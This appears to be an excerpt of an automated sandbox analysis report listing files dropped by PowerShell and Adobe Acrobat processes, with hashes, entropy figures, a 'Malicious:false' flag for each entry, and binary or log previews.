                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):144514
                                                                                                        Entropy (8bit):7.992637131260696
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                                                        MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                                                        SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                                                        SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                                                        SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                                                        Malicious:false
                                                                                                        Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):144514
                                                                                                        Entropy (8bit):7.992637131260696
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                                                        MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                                                        SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                                                        SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                                                        SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                                                        Malicious:false
                                                                                                        Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16525
                                                                                                        Entropy (8bit):5.376360055978702
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                        MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                        SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                        SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                        SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                        Malicious:false
                                                                                                        Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15113
                                                                                                        Entropy (8bit):5.369187492983371
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:k4MtEEFWpR2Wv5B6M9b2G96uU3fNkPSrcl8Ym+uspnndMjJ8inya6+HOPVf1RcMZ:7iG
                                                                                                        MD5:89D2BEC334F4B7859559188EFF59CABB
                                                                                                        SHA1:629A132326BFB02927510213FC45EB146CF410D6
                                                                                                        SHA-256:E67D370195FE12E4A787E4A869B253315C59A1DA2726F775259705639FA7C185
                                                                                                        SHA-512:DAF74734C4DD63459B47A4FF5979FEE060871AECCB944C7ECA5596FAC048C37ED328C3728ED5DEEF60494EDD3C19718F75F2AA91CF936AA2B793C8602432845E
                                                                                                        Malicious:false
                                                                                                        Preview:SessionID=c26479c6-179f-43ea-a74b-64ca1db11bff.1728346505359 Timestamp=2024-10-07T20:15:05:359-0400 ThreadID=1532 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=c26479c6-179f-43ea-a74b-64ca1db11bff.1728346505359 Timestamp=2024-10-07T20:15:05:359-0400 ThreadID=1532 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=c26479c6-179f-43ea-a74b-64ca1db11bff.1728346505359 Timestamp=2024-10-07T20:15:05:359-0400 ThreadID=1532 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=c26479c6-179f-43ea-a74b-64ca1db11bff.1728346505359 Timestamp=2024-10-07T20:15:05:359-0400 ThreadID=1532 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=c26479c6-179f-43ea-a74b-64ca1db11bff.1728346505359 Timestamp=2024-10-07T20:15:05:359-0400 ThreadID=1532 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):29752
                                                                                                        Entropy (8bit):5.397044109307872
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGb0:Q
                                                                                                        MD5:F74766CCA3C321157F52EBE5D1E97764
                                                                                                        SHA1:39421645D4B67598B9045F990EB3F554782E92EB
                                                                                                        SHA-256:95104D45E285E886C7C12D3DB8914BE73BA95AFFD3D5A54EC86D5335D2819CD3
                                                                                                        SHA-512:5B50FE1416824859F6BA6004F7493598C288D93AAA693C8FFFECBB112E34A20A787897018D096E622BA2F94E652D5CB7A4EFE76D8399651F456ECD7F9DADAB01
                                                                                                        Malicious:false
                                                                                                        Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1407294
                                                                                                        Entropy (8bit):7.97605879016224
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                        Malicious:false
                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1419751
                                                                                                        Entropy (8bit):7.976496077007677
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                                        MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                                        SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                                        SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                                        SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                                        Malicious:false
                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                        Category:dropped
                                                                                                        Size (bytes):386528
                                                                                                        Entropy (8bit):7.9736851559892425
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                        Malicious:false
                                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                        Category:dropped
                                                                                                        Size (bytes):758601
                                                                                                        Entropy (8bit):7.98639316555857
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                        Malicious:false
                                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):98682
                                                                                                        Entropy (8bit):6.445287254681573
                                                                                                        Encrypted:false
